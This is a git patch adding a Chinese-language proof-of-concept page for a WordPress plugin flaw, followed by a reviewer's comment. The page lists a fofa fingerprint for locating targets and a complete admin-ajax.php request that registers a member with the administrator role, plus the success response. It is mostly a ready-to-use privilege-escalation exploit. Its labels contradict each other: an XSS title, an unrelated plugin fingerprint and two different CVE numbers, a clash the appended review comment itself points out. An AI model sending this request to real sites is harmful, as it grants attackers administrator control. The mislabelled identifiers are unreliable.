From 67466e18faceacd4c136d545d3088cf1e84a011f Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 7 Apr 2025 14:08:11 +0800
Subject: [PATCH] =?UTF-8?q?Update=20WordPress=20Beam=20me=20up=20Scotty=20?= =?UTF-8?q?Plugin=E5=AD=98=E5=9C=A8xss=E6=BC=8F=E6=B4=9E(CVE-2025-31864).m?= =?UTF-8?q?d?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...cotty Plugin存在xss漏洞(CVE-2025-31864).md | 44 +++++++++++++++++++
1 file changed, 44 insertions(+)
diff --git a/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md b/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md
index 8b13789..d4ce449 100644
--- a/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md
+++ b/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md
@@ -1 +1,45 @@
+## WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864)
+## fofa
+```
+"/wp-content/plugins/wp-automatic"
+```
+## 第一步
+通过 /registration 或 /membership-registration 前端页面注册
+## 第二步,注册后,使用该请求数据
+```
+POST /wp-admin/admin-ajax.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
+Accept: */*
+Host: hackthebox.test
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
+
+----------------------------189123966817005614765335
+Content-Disposition: form-data; name="action"
+
+user_registration_membership_register_member
+----------------------------189123966817005614765335
+Content-Disposition: form-data; name="security"
+
+THE_NONCE_HERE
+----------------------------189123966817005614765335
+Content-Disposition: form-data; name="members_data"
+
+{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
+----------------------------189123966817005614765335--
+```
+## 第三步,返回相应包如下
+```
+{
+ "success": true,
+ "data": {
+ "member_id": 24,
+ "transaction_id": "",
+ "message": "New member has been successfully created."
+ }
+}
+```
+## github地址
+https://github.com/ubaydev/CVE-2025-2563
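Review bot: The identifiers in this entry contradict each other. The heading names an XSS issue in the Beam me up Scotty plugin under CVE-2025-31864, the fofa fingerprint is `"/wp-content/plugins/wp-automatic"`, the request body calls `user_registration_membership_register_member` with `"role":"administrator"` (a role assignment at registration, not script injection), and the reference link points to a repository named CVE-2025-2563. A defender using this page to scope exposure or write a detection would look for the wrong plugin and the wrong bug class, so the heading, file name, fingerprint and reference should all name the one component the request actually concerns. The page also has no remediation section; I would add a heading such as `## 修复建议` giving the affected and fixed versions (`<AFFECTED_VERSIONS>`, `<FIXED_VERSION>`) and telling readers to review `admin-ajax.php` logs for this action and audit for unexpected administrator accounts.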